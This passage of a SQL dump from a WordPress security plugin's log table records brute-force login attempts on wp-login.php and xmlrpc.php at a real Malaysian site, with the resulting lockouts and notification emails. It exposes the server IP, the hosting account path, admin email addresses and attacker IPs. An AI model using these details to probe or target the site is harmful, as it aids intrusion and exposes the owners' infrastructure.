Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"39919\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzH6j42Bg6xBpmAmGwKfwAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567410154.5256\";s:12:\"REQUEST_TIME\";s:10:\"1567410154\";}}','notice','2019-09-02 07:42:36','2019-09-02 07:42:35',18205224,19503752,'https://bintara.com.my/xmlrpc.php',1,0,'212.227.20.208'),(23557,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"218.3.44.195\";s:11:\"REMOTE_PORT\";s:5:\"33904\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzMTD42Bg6xBpmAmGwNuAAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567411276.7899\";s:12:\"REQUEST_TIME\";s:10:\"1567411276\";}}','notice','2019-09-02 08:01:17','2019-09-02 08:01:17',17682296,19173272,'https://bintara.com.my/wp-login.php',1,0,'218.3.44.195'),(23558,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"218.3.44.195\";s:11:\"REMOTE_PORT\";s:5:\"34162\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzMTzU4VuPOeWsfkg1HNwAAARI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567411279.7834\";s:12:\"REQUEST_TIME\";s:10:\"1567411279\";}}','notice','2019-09-02 08:01:21','2019-09-02 08:01:20',18200712,19498360,'https://bintara.com.my/xmlrpc.php',1,0,'218.3.44.195'),(23559,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.203.238\";s:11:\"REMOTE_PORT\";s:5:\"48806\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzQM2je8g9YegPUhtOoYQAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567412275.1544\";s:12:\"REQUEST_TIME\";s:10:\"1567412275\";}}','notice','2019-09-02 08:17:56','2019-09-02 08:17:55',17686144,19177192,'https://bintara.com.my/wp-login.php',1,0,'134.209.203.238'),(23560,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.203.238\";s:11:\"REMOTE_PORT\";s:5:\"49160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzQNj42Bg6xBpmAmGwRCwAAAFc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567412278.2733\";s:12:\"REQUEST_TIME\";s:10:\"1567412278\";}}','notice','2019-09-02 08:17:59','2019-09-02 08:17:58',18205256,19505552,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.203.238'),(23561,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.2.181\";s:11:\"REMOTE_PORT\";s:5:\"44848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzUSjU4VuPOeWsfkg1JFwAAARc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567413322.954\";s:12:\"REQUEST_TIME\";s:10:\"1567413322\";}}','notice','2019-09-02 08:35:24','2019-09-02 08:35:23',17687096,19177584,'https://bintara.com.my/wp-login.php',1,0,'139.59.2.181'),(26012,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:38:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:38:50\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:53:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:53:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:38:51','2019-09-21 13:38:50',17901224,19306592,'https://bintara.com.my/wp/wp-login.php',1,0,'223.27.16.120'),(26013,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:38:51','2019-09-21 13:38:50',18106816,19306592,'https://bintara.com.my/wp/wp-login.php',1,0,'223.27.16.120'),(26014,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYoHliJ7D9Gn7wDPh8iPgAAAMw\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.77.168\";s:11:\"REMOTE_PORT\";s:5:\"58586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYoHliJ7D9Gn7wDPh8iPgAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073182.3364\";s:12:\"REQUEST_TIME\";s:10:\"1569073182\";}}','notice','2019-09-21 13:39:43','2019-09-21 13:39:42',17855464,19342320,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26015,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:39:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:39:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:54:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:54:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:39:43','2019-09-21 13:39:42',17940176,19342320,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26016,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:39:43','2019-09-21 13:39:42',18146704,19342320,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.77.168'),(26017,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYoNbfBTP0kPOVnb8jvcwAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"45.40.135.73\";s:11:\"REMOTE_PORT\";s:5:\"44274\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYoNbfBTP0kPOVnb8jvcwAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073205.1077\";s:12:\"REQUEST_TIME\";s:10:\"1569073205\";}}','notice','2019-09-21 13:40:06','2019-09-21 13:40:05',17854560,19339536,'https://bintara.com.my/2019/wp-login.php',1,0,'45.40.135.73'),(26018,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:40:05\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:40:05\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:55:05\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:55:05\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:40:06','2019-09-21 13:40:05',17938848,19339536,'https://bintara.com.my/2019/wp-login.php',1,0,'45.40.135.73'),(26019,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:40:06','2019-09-21 